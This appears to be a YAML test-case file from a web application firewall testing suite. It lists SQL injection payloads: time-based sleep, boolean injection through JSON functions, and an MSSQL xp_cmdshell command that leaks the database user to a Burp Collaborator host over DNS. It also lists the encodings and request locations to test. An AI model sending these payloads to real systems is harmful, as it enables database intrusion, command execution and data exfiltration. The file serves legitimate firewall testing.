gitex2026/AttackSurface/dist/testcases/owasp/sql-injection.yml

payload:
  - "(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'%22+(select(0)from(select(sleep(15)))v)+%22*/"
  - "3;/* a */ DECLARE @c varchar(255);/* b */SELECT @c='ping '+master.sys.fn_varbintohexstr(convert(varbinary,SYSTEM_USER))+'.000.burpcol'+'laborator.net';/*xx*/ EXEC Master.dbo.xp_cmdshell @c;/*xxx*/ EXEC sp_SYS_ProtoOp @id=3"
  - "-1134')  OR JSON_EXTRACT('{''aKER'': 9648}', '$.aKER') = 9648*7799 AND ('QlYa' LIKE 'QlYa"
  - "123) AND 12=12  AND JSON_DEPTH('{}') != 2521"
encoder:
  - Base64Flat
  - URL
placeholder:
  - URLPath
  - URLParam
  - JSONRequest
  - Header
  - HTMLForm
  - HTMLMultipartForm
type: SQL Injection